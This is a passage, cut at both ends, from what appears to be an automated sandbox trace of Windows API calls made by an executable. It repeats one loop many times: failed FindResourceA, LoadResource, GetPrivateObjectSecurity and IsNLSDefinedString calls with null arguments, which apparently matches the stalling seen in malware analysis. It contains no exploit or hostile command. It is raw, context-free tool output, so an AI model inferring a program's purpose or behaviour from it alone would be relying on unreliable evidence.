returned 0x0 [0219.853] LockResource (hResData=0x0) returned 0x0 [0219.853] FreeResource (hResData=0x0) returned 0 [0219.853] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.853] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.853] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.853] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.853] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.853] LockResource (hResData=0x0) returned 0x0 [0219.853] FreeResource (hResData=0x0) returned 0 [0219.853] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.853] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.853] LockResource (hResData=0x0) returned 0x0 [0219.853] FreeResource (hResData=0x0) returned 0 [0219.853] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.853] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.853] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.853] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.853] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.853] LockResource (hResData=0x0) returned 0x0 [0219.853] FreeResource (hResData=0x0) returned 0 [0219.853] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.853] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.853] LockResource (hResData=0x0) returned 0x0 [0219.853] FreeResource (hResData=0x0) returned 0 [0219.853] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.853] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.853] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.853] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.853] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.853] LockResource (hResData=0x0) returned 0x0 [0219.853] FreeResource (hResData=0x0) returned 0 [0219.853] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.853] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.853] LockResource (hResData=0x0) returned 0x0 [0219.853] FreeResource (hResData=0x0) returned 0 [0219.853] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.853] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.853] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.853] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.854] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.854] LockResource (hResData=0x0) returned 0x0 [0219.854] FreeResource (hResData=0x0) returned 0 [0219.854] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.854] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.854] LockResource (hResData=0x0) returned 0x0 [0219.854] FreeResource (hResData=0x0) returned 0 [0219.854] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.854] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.854] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.854] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.854] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.854] LockResource (hResData=0x0) returned 0x0 [0219.854] FreeResource (hResData=0x0) returned 0 [0219.854] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.854] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.854] LockResource (hResData=0x0) returned 0x0 [0219.854] FreeResource (hResData=0x0) returned 0 [0219.854] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.854] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.854] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.854] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.854] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.854] LockResource (hResData=0x0) returned 0x0 [0219.854] FreeResource (hResData=0x0) returned 0 [0219.854] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.854] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.854] LockResource (hResData=0x0) returned 0x0 [0219.854] FreeResource (hResData=0x0) returned 0 [0219.854] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.854] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.854] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.854] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.854] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.854] LockResource (hResData=0x0) returned 0x0 [0219.854] FreeResource (hResData=0x0) returned 0 [0219.854] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.854] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.854] LockResource (hResData=0x0) returned 0x0 [0219.854] FreeResource (hResData=0x0) returned 0 [0219.854] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.854] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.854] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.854] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.854] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.854] LockResource (hResData=0x0) returned 0x0 [0219.854] FreeResource (hResData=0x0) returned 0 [0219.854] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.855] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.855] LockResource (hResData=0x0) returned 0x0 [0219.855] FreeResource (hResData=0x0) returned 0 [0219.855] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.855] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.855] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.855] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.855] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.855] LockResource (hResData=0x0) returned 0x0 [0219.855] FreeResource (hResData=0x0) returned 0 [0219.855] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.855] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.855] LockResource (hResData=0x0) returned 0x0 [0219.855] FreeResource (hResData=0x0) returned 0 [0219.855] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.855] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.855] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.855] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.855] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.855] LockResource (hResData=0x0) returned 0x0 [0219.855] FreeResource (hResData=0x0) returned 0 [0219.855] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.855] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.855] LockResource (hResData=0x0) returned 0x0 [0219.855] FreeResource (hResData=0x0) returned 0 [0219.855] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.855] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.855] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.855] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.855] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.855] LockResource (hResData=0x0) returned 0x0 [0219.855] FreeResource (hResData=0x0) returned 0 [0219.855] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.855] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.855] LockResource (hResData=0x0) returned 0x0 [0219.855] FreeResource (hResData=0x0) returned 0 [0219.855] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.855] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.855] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.855] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.855] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.855] LockResource (hResData=0x0) returned 0x0 [0219.855] FreeResource (hResData=0x0) returned 0 [0219.855] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.855] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.855] LockResource (hResData=0x0) returned 0x0 [0219.855] FreeResource (hResData=0x0) returned 0 [0219.855] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.856] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.856] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.856] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.856] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.856] LockResource (hResData=0x0) returned 0x0 [0219.856] FreeResource (hResData=0x0) returned 0 [0219.856] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.856] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.856] LockResource (hResData=0x0) returned 0x0 [0219.856] FreeResource (hResData=0x0) returned 0 [0219.856] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.856] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.856] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.856] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.856] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.856] LockResource (hResData=0x0) returned 0x0 [0219.856] FreeResource (hResData=0x0) returned 0 [0219.856] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.856] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.856] LockResource (hResData=0x0) returned 0x0 [0219.856] FreeResource (hResData=0x0) returned 0 [0219.856] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.856] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.856] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.856] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.856] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.856] LockResource (hResData=0x0) returned 0x0 [0219.856] FreeResource (hResData=0x0) returned 0 [0219.856] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.856] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.856] LockResource (hResData=0x0) returned 0x0 [0219.856] FreeResource (hResData=0x0) returned 0 [0219.856] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.856] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.856] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.856] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.857] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.857] LockResource (hResData=0x0) returned 0x0 [0219.857] FreeResource (hResData=0x0) returned 0 [0219.857] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.857] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.857] LockResource (hResData=0x0) returned 0x0 [0219.857] FreeResource (hResData=0x0) returned 0 [0219.857] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.857] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.857] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.857] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.857] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.857] LockResource (hResData=0x0) returned 0x0 [0219.857] FreeResource (hResData=0x0) returned 0 [0219.857] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.857] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.857] LockResource (hResData=0x0) returned 0x0 [0219.857] FreeResource (hResData=0x0) returned 0 [0219.857] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.857] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.857] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.857] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.857] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.857] LockResource (hResData=0x0) returned 0x0 [0219.857] FreeResource (hResData=0x0) returned 0 [0219.857] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.857] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.857] LockResource (hResData=0x0) returned 0x0 [0219.857] FreeResource (hResData=0x0) returned 0 [0219.857] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.857] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.857] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.857] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.857] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.857] LockResource (hResData=0x0) returned 0x0 [0219.857] FreeResource (hResData=0x0) returned 0 [0219.857] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.857] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.857] LockResource (hResData=0x0) returned 0x0 [0219.857] FreeResource (hResData=0x0) returned 0 [0219.857] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.857] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.858] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.858] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.858] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.858] LockResource (hResData=0x0) returned 0x0 [0219.858] FreeResource (hResData=0x0) returned 0 [0219.858] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.858] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.858] LockResource (hResData=0x0) returned 0x0 [0219.858] FreeResource (hResData=0x0) returned 0 [0219.858] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.858] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.858] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.858] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.858] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.858] LockResource (hResData=0x0) returned 0x0 [0219.858] FreeResource (hResData=0x0) returned 0 [0219.858] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.858] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.858] LockResource (hResData=0x0) returned 0x0 [0219.858] FreeResource (hResData=0x0) returned 0 [0219.858] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.858] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.858] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.858] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.858] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.858] LockResource (hResData=0x0) returned 0x0 [0219.858] FreeResource (hResData=0x0) returned 0 [0219.858] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.858] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.858] LockResource (hResData=0x0) returned 0x0 [0219.858] FreeResource (hResData=0x0) returned 0 [0219.858] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.858] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.858] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.858] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.858] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.858] LockResource (hResData=0x0) returned 0x0 [0219.859] FreeResource (hResData=0x0) returned 0 [0219.859] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.859] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.859] LockResource (hResData=0x0) returned 0x0 [0219.859] FreeResource (hResData=0x0) returned 0 [0219.859] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.859] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.859] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.859] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.859] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.859] LockResource (hResData=0x0) returned 0x0 [0219.859] FreeResource (hResData=0x0) returned 0 [0219.859] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.859] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.859] LockResource (hResData=0x0) returned 0x0 [0219.859] FreeResource (hResData=0x0) returned 0 [0219.859] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.859] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.859] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.859] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.859] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.859] LockResource (hResData=0x0) returned 0x0 [0219.859] FreeResource (hResData=0x0) returned 0 [0219.859] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.859] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.859] LockResource (hResData=0x0) returned 0x0 [0219.859] FreeResource (hResData=0x0) returned 0 [0219.859] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.859] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.859] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.859] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.859] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.859] LockResource (hResData=0x0) returned 0x0 [0219.859] FreeResource (hResData=0x0) returned 0 [0219.859] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.859] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.859] LockResource (hResData=0x0) returned 0x0 [0219.859] FreeResource (hResData=0x0) returned 0 [0219.860] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, 